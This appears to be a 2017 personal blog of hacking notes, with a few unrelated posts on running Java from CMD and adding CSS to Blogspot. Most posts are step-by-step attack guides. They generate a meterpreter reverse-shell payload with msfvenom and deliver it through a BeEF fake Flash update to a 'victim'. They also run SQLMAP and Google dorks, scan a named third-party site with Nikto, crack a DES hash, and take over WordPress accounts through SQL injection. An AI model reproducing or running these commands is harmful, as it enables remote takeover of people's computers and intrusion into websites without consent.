Wednesday, June 7, 2017

Hacking Kali Linux

https://www.darkmoreops.com/

Use SQLMAP SQL Injection to hack a website and database in Kali Linux

Use SQLMAP SQL Injection to hack a website and database in Kali Linux
Find vulnerable website - Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Enumerate DBMS databases






Cracking password
Identify hash type


I saved the hash value 24iYBc17xK0e. in DES.hash file.

Tuesday, June 6, 2017

Run Java using CMD



Download Latest Java
Config Java path in Computer Properties>Environment Variables
  • Select Start -> Computer -> System Properties -> Advanced system settings -> Environment Variables -> System variables -> PATH.
  • Prepend C:\Program Files\Java\jdk1.6.0_27\bin; to the beginning of the PATH variable.
  • Click OK three times.
  • check java version
  • C:\Users\username>java -version
  • C:\Users\username>javac -version
Customize CMD
  • Set Layout -> Screen Buffer Size to 80 x 500.
  • Select Options -> Edit Options -> QuickEdit Mode.
  • Select Options -> Edit Options -> Insert Mode.
Compile and Execute
  • C:\Users\username>cd c:\introcs\hello
  • C:\introcs\hello\>
  • C:\introcs\hello\>javac HelloWorld.java
  • C:\introcs\hello\>
  • C:\introcs\hello\>java HelloWorld



Hack / Control Anyone's PC with BeEF | Kali Linux | Tutorial | 2017

BeEF
root@kali:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=443 x > /root/Desktop/payload.exe
root@kali:clear
root@kali:cd /usr/sharebeef-xss/
root@kali:./beef


Open msfconsole
msf>use exploit/multi/handler
msf>exploit(handler)>show options
msf>set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf>exploit(handler)>set LHOST 192.168.1.105
LHOST=>192.168.1.105
msf>exploit(handler)>set LPORT 443
LPORT=443
msf>show options
msf>exploit
make simple fake download page
transfer created payload from desktop to var/www/html
copy Hook URL:[ip address] from ./beef results and pased it in index.html

index.html from var/www/html [see screenshot below]

visit the BeEf website UI [192.168.1.105:3000/ui/panel - can view from ./beef results]
login beef/beef usernamea and password

open cmd:
root@kali: service apache2 start
open browser and type 192.168.1.105
go to BeEF Control Panel from browser tab
select online browsers>192.168.1.105>192.168.1.105>click Commands tab
click Social Engineering folder>select Fake Flash Update
update image: http://your ip
update custom payload URL: http://your ip
click execute
once victim will download it.. youll recieve a meterpreter session.
to interact with the meterpreter session just type:
sessions -i L
[this will interact with the meterpreter session "l", if you want to see a list of sessionts just type: sessions]
type "Help" or "?" to have a full list of usefull commands to control your victim's computer]

Nikto Kali Linux

how to use nikto
go to applications>Vulnerability Analysis>nikto
root@kali:nikto
root@kali:nikto -H
root@kali:nikto -h http://hongtonggas.co.th/
sample displayed with vulnerable:
+ /profile.php?u=ggeFUuyt: Potential PHP MySQL database connection string found.
root@kali:nikto -h http://hongtonggas.co.th/ -Tuning 9

Thursday, June 1, 2017

Add CSS file in Blogspot.com

Add css file in blogspot.com 1.create css file using notepad and save with .css extension(encoding: UTF-8) 2.create folder in google drive and upload the created .css and .js file 3.select file by ticking checkboxes and share it in public view 4.Following code should be change: *orig https://drive.google.com/file/d/0B4n9GL3eVuV-TkphMkc3SFR2Slk/edit?usp=sharing *https://googledrive.com/host/0B4n9GL3eVuV-TkphMkc3SFR2Slk 5.go to template html code and paste below format code under tags

Hack WP using sql injection

STEP 1 – Find out Vulnerabilities in WordPress Website

  *desc[union query that fetch all db from wp_users table(to user user admin)]


 *desc[$_pid variables]
 *desc[all-video-gallery plugins(w/ vulnerabilities)]

if u append



STEP 2 – Reset WordPress Password and Get Activation Key

 *desc [activation code will display in <buffer>activation code here</buffer>]

STEP 3 – Use Activation key and Reset Password
link http://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}